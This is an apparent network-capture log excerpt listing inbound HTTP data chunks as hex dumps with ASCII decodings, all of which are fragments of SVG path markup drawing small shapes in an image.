                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1826INData Raw: 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 33 2e 37 39 2c 32 30 34 2e 34 36 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 34 2c 32 31 31 2e 32 38 61 31 2e 37 2c 31 2e 37 2c
                                                                                                                                                                                                                                                                                        Data Ascii: 0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M833.79,204.46a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M834,211.28a1.7,1.7,
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1842INData Raw: 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 33 2e 32 37 2c 31 32 33 2e 34 36 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38
                                                                                                                                                                                                                                                                                        Data Ascii: 0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><path class="cls-4" d="M803.27,123.46a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path class="cls-4" d="M8
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1858INData Raw: 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 36 2e 31 35 2c 32 33 33 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68
                                                                                                                                                                                                                                                                                        Data Ascii: 9.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M786.15,233.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"></path><path
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1874INData Raw: 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 32 2c 32 36 37 2e 33 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 31 2e 37 31 2c 32 35 39 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: h class="cls-7" d="M522,267.3a1.91,1.91,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path class="cls-7" d="M521.71,259.58a1.91,1.91,0,0,1-.86,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1890INData Raw: 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 34 31 2e 35 38 2c 31 35 30 2e 37 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63
                                                                                                                                                                                                                                                                                        Data Ascii: 2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M541.58,150.76a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path c
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1906INData Raw: 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 35 39 2c 32 35 37 2e 37 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 33 33 2c 32 35 30 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                                        Data Ascii: 8,3.17"></path><path class="cls-7" d="M576.59,257.72a1.91,1.91,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M576.33,250a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1922INData Raw: 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 36 2e 32 2c 31 34 31 2e 31 38 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20
                                                                                                                                                                                                                                                                                        Data Ascii: 1,2.69,2.69,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M596.2,141.18a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1938INData Raw: 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2e 32 31 2c 32 34 38 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2c 32 34 30 2e 34 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                                        Data Ascii: lass="cls-7" d="M631.21,248.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"></path><path class="cls-7" d="M631,240.43a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.67,2.67,0,0,
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1954INData Raw: 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 35 30 2e 38 31 2c 31 33 31 2e 36 31 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63
                                                                                                                                                                                                                                                                                        Data Ascii: .05,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M650.81,131.61a1.92,1.92,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.34,2.34,0,0,1,.18,3.17"></path><path c
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1970INData Raw: 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 38 33 2c 32 33 38 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 35 37 2c 32 33 30 2e 38 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: <path class="cls-7" d="M685.83,238.58a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M685.57,230.86a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1986INData Raw: 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 30 35 2e 34 33 2c 31 32 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73
                                                                                                                                                                                                                                                                                        Data Ascii: .66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class="cls-7" d="M705.43,122a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2002INData Raw: 34 30 2e 34 35 2c 32 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 34 30 2e 31 39 2c 32 32 31 2e 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: 40.45,229a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path class="cls-7" d="M740.19,221.29a1.92,1.92,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2018INData Raw: 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 30 2e 30 35 2c 31 31 32 2e 34 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 35 39 2e 37 39 2c 31 30 34
                                                                                                                                                                                                                                                                                        Data Ascii: 2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M760.05,112.46a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M759.79,104
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2034INData Raw: 4d 36 36 31 2e 31 36 2c 33 38 31 2e 31 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 36 31 2e 32 33 2c 33 37 32 2e 34 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: M661.16,381.13a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M661.23,372.45a2.16,2.16,0,0,1-1.09,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2050INData Raw: 32 33 33 2e 38 31 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 39 2c 32 32 35 2e 31 33 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e
                                                                                                                                                                                                                                                                                        Data Ascii: 233.81a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M689,225.13a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2066INData Raw: 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2e 34 33 2c 33 32 30 2e 39 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73
                                                                                                                                                                                                                                                                                        Data Ascii: -4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path class="cls-9" d="M723.43,320.92a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path clas
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2082INData Raw: 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 38 36 2c 34 31 36 2e 37 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 39 33 2c 34 30 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30
                                                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1,3.61.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M757.86,416.72a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M757.93,408a2.15,2.15,0,0
